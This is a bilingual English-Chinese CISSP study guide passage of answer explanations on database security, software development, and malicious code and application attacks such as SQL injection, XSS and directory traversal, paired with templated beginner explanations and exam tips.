唯一标识数据库记录。 备用键是未被选为主键的候选键。 8. D. 在这种情况下,数据库用户利用的流程是聚合。 聚合攻击涉及使用专门 的数据库函数,将大量数据库记录中的信息组合起来,以揭示比单条记录所 显示的信息更为敏感的信息。 推断攻击利用演绎推理,从现有数据中得出结 论。 污染是指将较高密级和/或知悉需求的数据与较低密级和/或知悉需求的 数据混合。 多实例化是指为不同安全级别的用户创建不同的数据库记录。 9. C. 多实例化允许在不同密级下向数据库中插入多个看似具有相同主键值的 记录。 聚合攻击涉及使用专门的数据库函数,将大量数据库记录中的信息组 合起来,以揭示比单条记录所显示的信息更为敏感的信息。 推断攻击利用演 绎推理,从现有数据中得出结论。 篡改是指对数据库中的数据进行授权或未 经授权的修改。 10. D. 在敏捷开发中,最高优先级是通过早期和持续地交付有价值的软件来 满足客户,而不是将安全置于其他需求之上。 敏捷原则还包括通过早期和持 续交付来满足客户、业务人员与开发人员紧密合作,以及持续关注技术卓越。 11. C. 专家系统使用由一系列“如果/那么”语句组成的知识库,基于人类专 家的先前经验做出决策。

12. D. 在已管理阶段(SW‑CMM第4级),组织使用定量度量来对开发过程 获得详细的了解。 13. B. ODBC 充当应用程序与后端 DBMS 之间的代理。 软件开发生命周期 (SDLC)是一种软件开发过程模型,涵盖了所有必要的活动。 支付卡行业数 据安全标准(PCI DSS)是一项监管

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

PCI DSS:PCI DSS 是支付卡行业数据安全标准。

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

信用卡/持卡人数据场景优先想到 PCI DSS。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
PCI DSS PCI DSS 是支付卡行业数据安全标准。
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
软件开发生命周期 SDLC 把需求、设计、开发、测试、部署和维护串起来。
学习单元 150 / PDF P1544

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

framework for payment card processing. Abstraction is a software development concept that generalizes common behaviors of software objects into more abstract classes. 14. A. In order to conduct a static test, the tester must have access to the underlying source code. Black-box testing does not require access to source code. Dynamic testing is an example of black-box testing. Crosssite scripting is a specific type of vulnerability, and it may be discovered using both static and dynamic techniques, with or without access to the source code. 15. A. A Gantt chart is a type of bar chart that shows the interrelationships over time between projects and schedules.

It provides a graphical illustration of a schedule that helps to plan, coordinate, and track specific tasks in a project. A PERT chart focuses on the interrelationships between tasks rather than the specific details of the schedule. Bar charts are used to present data, and Venn diagrams are used to show the relationships between sets. 16. C. Contamination is the mixing of data from a higher classification level and/or need-to-know requirement with data from a lower classification level and/or need-to-know requirement.

Aggregation attacks involve the use of specialized database functions to combine information from a large number of database records to reveal information that may be more sensitive than the information in individual records would reveal. Inference attacks use deductive reasoning to reach conclusions from existing data. Polyinstantiation includes additional records in a database for presentation to users with differing security levels as a defense against inference attacks. 17. D. Tonya is purchasing the software, so it is not open-source. It is used widely in her industry, so it is not custom developed for her organization.

There is no indication in the question that the software is an enterprise resource planning (ERP) system. The best answer here is commercialoff-the-shelf software (COTS). 18. C. Configuration audit is part of the configuration management process rather than the change management process. Request control, release control, and change control are all components of the change management process. 19. C. The isolation principle states that two transactions operating on the same data must be temporarily separated from each other such that one

中文直译 / 整理

支付卡处理框架。 抽象是软件开发中的一个概念,它将软件对象的共 同行为概括为更抽象的类。 14. A. 为了进行静态测试,测试人员必须能够访问底层源代码。 黑盒测试不 需要访问源代码。 动态测试是黑盒测试的一种示例。 跨站脚本是一种特定类 型的漏洞,可以通过静态和动态技术发现,无论是否具有源代码访问权限。 15. A. 甘特图是一种条形图,用于显示项目与计划之间随时间变化的相互关系。 它以图形方式展示计划,有助于规划、协调和跟踪项目中的具体任务。 PERT 图侧重于任务之间的相互关系,而非计划的具体细节。 条形图用于呈现 数据,而文氏图用于展示集合之间的关系。 16. C. 污染是指将较高密级和/或知悉需求的数据与较低密级和/或知悉需求的 数据混合。 聚合攻击涉及使用专用数据库函数,将大量数据库记录中的信息组 合起来,以揭示比单个记录所显示的信息更为敏感的信息。 推理攻击利用演绎 推理从现有数据中得出结论。 多实例化通过为具有不同安全级别的用户添加额 外记录来防御推理攻击。 17. D. Tonya 正在购买该软件,因此它不是开源的。 它在她的行业中被广泛 使用,因此并非为她的组织定制开发。

问题中没有迹象表明该软件是企业资源 规划(ERP)系统。 此处的最佳答案是商用现成软件(COTS)。 18. C. 配置审计是配置管理过程的一部分,而不是变更管理过程的一部分。 请求控制、发布控制和变更控制都是变更管理过程的组成部分。 19. C. 隔离原则指出,对相同数据进行操作的两个事务必须暂时相互分离,以便 一个

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

审计:审计记录主体行为,用于追责、复盘和取证。

抽象:抽象把复杂细节藏在接口后,只暴露必要功能。

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

没有日志和身份绑定,就很难问责。

对象、角色、组、接口都可能体现 abstraction。

ISO 偏标准和管理体系。

IPS 放在线路中,误报可能影响可用性。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
审计 审计记录主体行为,用于追责、复盘和取证。
抽象 抽象把复杂细节藏在接口后,只暴露必要功能。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
审计 审计检查控制是否存在、是否有效、是否符合要求。
学习单元 151 / PDF P1545

第 1545 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

does not interfere with the other. The atomicity principle says that if any part of the transaction fails, the entire transaction must be rolled back. The consistency principle says that the database must always be in a state that complies with the database model's rules. The durability principle says that transactions committed to the database must be preserved. 20. B. The cardinality of a table refers to the number of rows in the table, while the degree of a table is the number of columns. In this case, the table has three columns (name, telephone number, and customer ID), so it has a degree of three.

中文直译 / 整理

不会干扰其他操作。 原子性原则指出,如果事务的任何一部分失败,整个 事务必须回滚。 一致性原则指出,数据库必须始终处于符合数据库模型规 则的状态。 持久性原则指出,已提交到数据库的事务必须被保留。 20. B. 表的基数是指表中的行数,而表的度是指表中的列数。 在此情况下,该 表有三列(姓名、电话号码和客户ID),因此其度为三。

小白解释

场景先行:你是公司的安全负责人,正在读第 1545 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1545 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 152 / PDF P1546

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Chapter 21: Malicious Code and Application Attacks 1. D. User and entity behavior analytics (UEBA) tools develop profiles of individual behavior and then monitor users for deviations from those profiles that may indicate malicious activity and/or compromised accounts. This type of tool would meet Dylan's requirements. Endpoint detection and response (EDR) tools watch for unusual endpoint behavior but do not analyze user activity. Integrity monitoring is used to identify unauthorized system/file changes. Signature detection is a malware detection technique. 2. B. All of these technologies are able to play important roles in defending against malware and other endpoint threats.

User and entity behavior analysis (UEBA) looks for behavioral anomalies. Endpoint detection and response (EDR) and next generation endpoint protection (NGEP) identify and respond to malware infections. However, only managed detection and response (MDR) combines antimalware capabilities with a managed service that reduces the burden on the IT team. 3. C. If Carl has backups available, that would be his best option to recover operations. He could also pay the ransom, but this would expose his organization to legal risks and incur unnecessary costs. Rebuilding the systems from scratch would not restore his data.

Installing antivirus software would be helpful in preventing future compromises, but these packages would not likely be able to decrypt the missing data. 4. A. While an advanced persistent threat (APT) may leverage any of these attacks, they are most closely associated with zero-day exploits due to the cost and complexity of the research required to discover or purchase them. Social engineering, Trojans (and other malware), and SQL injection attacks are often attempted by many different types of attackers. 5. B. Buffer overflow vulnerabilities exist when a developer does not properly validate user input to ensure that it is of an appropriate size.

Input that is too large can “overflow” a data structure to affect other data stored in the computer's memory. Time-of-check to time-of-use (TOCTTOU) attacks exploit timing differences that lead to race conditions. Cross-site scripting (XSS) attacks force the execution of

中文直译 / 整理

第21章:恶意代码与应用程序攻击 1. D. 用户和实体行为分析(UEBA)工具会建立个人行为的画像,然后监控 用户行为是否偏离这些画像,以识别潜在的恶意活动和/或被攻破的账户。 此 类工具符合戴伦的要求。 终端检测与响应(EDR)工具监控终端的异常行为, 但不分析用户活动。 完整性监控用于识别未经授权的系统/文件更改。 签名检 测是一种恶意软件检测技术。 2. B. 所有这些技术都能在防御恶意软件和其他终端威胁中发挥重要作用。 用 户和实体行为分析(UEBA)寻找行为异常。 终端检测与响应(EDR)和下 一代终端防护(NGEP)识别并应对恶意软件感染。 然而,只有托管检测与 响应(MDR)将反恶意软件功能与托管服务相结合,从而减轻IT团队的负 担。 3. C. 如果卡尔有可用的备份,这将是他恢复运营的最佳选择。 他也可以支 付赎金,但这会使他的组织面临法律风险并产生不必要的成本。 从头重建系 统无法恢复他的数据。 安装防病毒软件有助于防止未来的入侵,但这些软件 包通常无法解密丢失的数据。

4. A. 尽管高级持续性威胁(APT)可能利用这些攻击中的任何一种,但由于 发现或购买零日漏洞所需的研究成本和复杂性,它们最常与零日漏洞相关联。 社会工程、木马(及其他恶意软件)和SQL注入攻击通常由多种不同类型的 攻击者尝试。 5. B. 当开发人员未正确验证用户输入以确保其大小合适时,就会出现缓冲区 溢出漏洞。 过大的输入可能会“溢出”数据结构,影响计算机内存中存储的 其他数据。 时间检查到时间使用(TOCTTOU)攻击利用时间差异导致的竞 争条件。 跨站脚本(XSS)攻击强制执行

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

授权:授权是认证之后决定你能访问什么、能做什么。

程序:程序是一步一步怎么做。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
注入攻击 注入攻击把恶意输入当命令或查询执行。
跨站脚本 XSS XSS 把脚本注入到网页,让浏览器执行。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 153 / PDF P1547

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

malicious scripts in the user's browser. Cross-site request forgery (XSRF) attacks exploit authentication trust between browser tabs. 6. B. TOC/TOU is a type of timing vulnerability that occurs when a program checks access permissions too far in advance of a resource request. Backdoors are code that allow those with knowledge of the back door to bypass authentication mechanisms. Buffer overflow vulnerabilities exist when a developer does not properly validate user input to ensure that it is of an appropriate size. Input that is too large can “overflow” a data structure to affect other data stored in the computer's memory.

SQL injection attacks include SQL code in user input in the hopes that it will be passed to and executed by the backend database. 7. D. The try…catch clause is used to attempt to evaluate code contained in the try clause and then handle errors with the code located in the catch clause. The other constructs listed here (if…then, case…when, and do… while) are all used for control flow. 8. C. In this case, the .. operators are the telltale giveaway that the attacker was attempting to conduct a directory traversal attack. This particular attack sought to break out of the web server's root directory and access the /etc/passwd file on the server.

SQL injection attacks would contain SQL code in them. File upload attacks seek to upload a file to the server. Session hijacking attacks require the theft of authentication tokens or other credentials. 9. A. Logic bombs wait until certain conditions are met before delivering their malicious payloads. Worms are malicious code objects that move between systems under their own power, while viruses require some type of human intervention. Trojan horses masquerade as useful software but then carry out malicious functions after installation. 10. D. The single quote character (') is used in SQL queries and must be handled carefully on web forms to protect against SQL injection attacks. 11. B.

Developers of web applications should leverage parametrized queries or stored procedures to limit the application's ability to execute arbitrary code. With stored procedures, the SQL statement resides on the database server and may only be modified by database developers or administrators. With parameterized queries, the SQL statement is defined within the application and variables are bound to that statement in a safe manner.

中文直译 / 整理

用户浏览器中的恶意脚本。 跨站请求伪造(XSRF)攻击利用浏览器标签页之 间的身份验证信任。 6. B. TOC/TOU 是一种时序漏洞,当程序在资源请求之前过早检查访问权限 时会发生此类漏洞。 后门是允许知晓后门的人绕过身份验证机制的代码。 当 开发人员未正确验证用户输入以确保其大小合适时,就会存在缓冲区溢出漏 洞。 过大的输入可能会“溢出”数据结构,影响计算机内存中存储的其他数 据。 SQL 注入攻击在用户输入中包含 SQL 代码,希望其被传递到后端数据 库并执行。 7. D. try...catch 子句用于尝试评估 try 子句中包含的代码,然后使用 catch 子句中的代码处理错误。 此处列出的其他构造(if...then、case...when 和 do...while)均用于控制流程。 8. C. 在这种情况下,.. 操作符是攻击者试图进行目录遍历攻击的明显迹象。 这种特定的攻击旨在跳出 Web 服务器的根目录,访问服务器上的 / etc/passwd 文件。 SQL 注入攻击会包含 SQL 代码。 文件上传攻击旨在将文 件上传到服务器。 会话劫持攻击需要窃取身份验证令牌或其他凭证。

9. A. 逻辑炸弹会在满足特定条件后才释放其恶意有效载荷。 蠕虫是能够在系 统间自主传播的恶意代码对象,而病毒则需要某种形式的人为干预。 特洛伊 木马伪装成有用软件,但在安装后会执行恶意功能。 10. D. 单引号字符 (') 用于 SQL 查询,在网页表单中必须谨慎处理,以防范 SQL 注入攻击。 11. B. 网络应用程序的开发人员应使用参数化查询或存储过程,以限制应用程 序执行任意代码的能力。 使用存储过程时,SQL 语句驻留在数据库服务器上, 只能由数据库开发人员或管理员修改。 使用参数化查询时,SQL 语句在应用 程序内部定义,变量以安全的方式绑定到该语句。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

认证:认证是验证“你是不是你声称的那个人”。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

密码、令牌、生物特征、多因素认证都服务认证。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
认证 认证是验证“你是不是你声称的那个人”。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
日志 日志记录系统和用户活动,用于监控、审计和调查。
注入攻击 注入攻击把恶意输入当命令或查询执行。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 154 / PDF P1548

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

12. C. While any malware may be leveraged for financial gain, depending upon its payload, cryptomalware is specifically designed for this purpose. It steals computing power and uses it to mine cryptocurrency. Remote access Trojans (RATs) are designed to grant attackers remote administrative access to systems. Potentially unwanted programs (PUPs) are any type of software that is initially approved by the user but then performs undesirable actions. Worms are malicious code objects that move between systems under their own power. 13. A. Cross-site scripting attacks are often successful against web applications that include reflected input.

This is one of the two main categories of XSS attacks in a discussion forum posting. The script content will then be processed each time another visitor views the posting from the attacker. The injected script code can cause additional browser pop-ups leading to URLs of the attacker's choosing. 14. D. Buffer overflow attacks allow an attacker to modify the contents of a system's memory by writing beyond the space allocated for a variable. 15. A. Packets with internal source IP addresses should not be allowed to enter the network from the outside because they are likely spoofed.

Packets with internal source IP addresses should be able to exit the network from the inside, and packets with external source IP addresses should be able to enter the network from the outside, as these are both normal network activity. Packets with public IP addresses should be able to pass through the firewall in both directions, assuming that they meet other security requirements. 16. B. Cross-site scripting (XSS) attacks insert content on a website that causes viewers of that content to execute a script. Although this website is backed by a database, the threat that Bob is worried about does not affect the backend database and, therefore, is not a SQL injection attack.

Buffer overflow attacks attempt to manipulate the contents of memory, and evil twin attacks are against wireless networks, not websites. 17. B, C, D. Input validation protects against a wide variety of web-based attacks, including SQL injection. Input validation typically includes checking for appropriate length, checking for known examples of malware or abusive input, and escaping metacharacters. Developers may also defend against SQL injection attacks by using stored procedures and parameterized queries. User acceptance testing verifies the proper functioning of code and is not a protection against SQL injection attacks. 12. C.

中文直译 / 整理

尽管任何恶意软件都可能被用于牟利,具体取决于其有效载荷,但加密 恶意软件专为此目的设计。 它窃取计算能力并用于挖矿加密货币。 远程访问木 马(RATs)旨在为攻击者提供对系统的远程管理访问权限。 潜在不需要的程 序(PUPs)是指最初由用户批准但随后执行不良行为的任何类型的软件。 蠕 虫是能够在系统间自主传播的恶意代码对象。 13. A. 跨站脚本攻击通常针对包含反射输入的Web应用程序成功。 这是讨 论区帖子中XSS攻击的两大主要类别之一。 每次其他访客查看该帖子时,注 入的脚本内容都会被处理。 注入的脚本代码可能导致额外的浏览器弹出窗口, 指向攻击者选择的URL。 14. D. 缓冲区溢出攻击允许攻击者通过写入超出变量分配空间的范围来修改系统 内存的内容。 15. A. 来自外部的、源IP地址为内部地址的数据包不应被允许进入网络,因 为它们可能是伪造的。 内部源IP地址的数据包应能从内部离开网络,外部源 IP地址的数据包应能从外部进入网络,因为这两种情况都属于正常的网络活 动。 只要满足其他安全要求,具有公共IP地址的数据包应能双向通过防火墙。

16. B. 跨站脚本(XSS)攻击会在网站上插入内容,导致访问该内容的用户 执行脚本。 尽管该网站由数据库支持,但Bob所担心的威胁并不会影响后端 数据库,因此不属于SQL注入攻击。 缓冲区溢出攻击试图操纵内存内容,而 恶意双胞胎攻击针对的是无线网络,而非网站。 17. B、C、D。 输入验证可防范多种基于Web的攻击,包括SQL注入。 输入 验证通常包括检查输入长度是否合适、检查已知的恶意软件或滥用输入,以 及转义元字符。 开发人员还可通过使用存储过程和参数化查询来防御SQL注 入攻击。 用户验收测试用于验证代码的正常功能,并非针对SQL注入攻击的 防护措施。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
注入攻击 注入攻击把恶意输入当命令或查询执行。
跨站脚本 XSS XSS 把脚本注入到网页,让浏览器执行。
学习单元 155 / PDF P1549

保护机制:分层、隐藏、加密和边界

单一控制不够,安全靠多个机制配合。

教材原文段落

18. A. SQL injection attacks allow attackers to include their own SQL commands in the commands issued by a web application to a database. 19. A. Ransomware's signature characteristic is the encryption of files using a key known only to the attacker and then demanding payment in exchange for the decryption key. 20. A. User and entity behavior analytics (UEBA) tools develop profiles of individual behavior and then monitor users for deviations from those profiles that may indicate malicious activity and/or compromised accounts. This type of tool would meet Rhonda's requirements. 18. A. SQL

中文直译 / 整理

注入攻击允许攻击者将他们自己的SQL命令包含在Web应用程序发 送给数据库的命令中。 19. A. 勒索软件的典型特征是使用只有攻击者才知道的密钥加密文件,然后 要求支付费用以换取解密密钥。 20. A. 用户和实体行为分析(UEBA)工具会建立个体行为的档案,然后 监控用户是否出现偏离这些档案的行为,以识别可能的恶意活动和/或被攻 破的账户。 这种工具能够满足罗nda的要求。

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:单一控制不够,安全靠多个机制配合。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

注入攻击:注入攻击把恶意输入当命令或查询执行。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“保护机制:分层、隐藏、加密和边界”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 156 / PDF P1550

章末总结与练习题

章末内容用来反查自己是否真的理解,而不是只背答案。

教材原文段落

Appendix B Answers to Written Labs

中文直译 / 整理

附录 B 书面实验答案

小白解释

场景先行:你是公司的安全负责人,正在读第 1550 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:章末内容用来反查自己是否真的理解,而不是只背答案。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“章末总结与练习题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

遇到章末题时,不要只看选项。先判断题干在问定义、责任归属、最佳下一步,还是控制措施选择。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 157 / PDF P1551

五大支柱与 CIA 三元组

先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

教材原文段落

Chapter 1: Security Governance Through Principles and Policies 1. The CIA Triad is the combination of confidentiality, integrity, and availability. Confidentiality is the concept of the measures used to ensure the protection of the secrecy of data, information, or resources. Integrity is the concept of protecting the reliability and correctness of data. Availability is the concept that authorized subjects are granted timely and uninterrupted access to objects. The term CIA Triad is used to indicate the three key components of a security solution. 2. The requirements of accounting are identification, authentication, authorization, and auditing.

Each of these components needs to be legally supportable to truly hold someone accountable for their actions. 3. The six security roles are senior manager, security professional, asset owner, custodian, operator/user, and auditor. 4. The four components of a security policy are policies, standards, guidelines, and procedures. Policies are broad security statements. Standards are definitions of hardware and software security compliance. Guidelines are used when there is not an appropriate procedure. Procedures are detailed step-by-step instructions for performing work tasks in a secure manner.

中文直译 / 整理

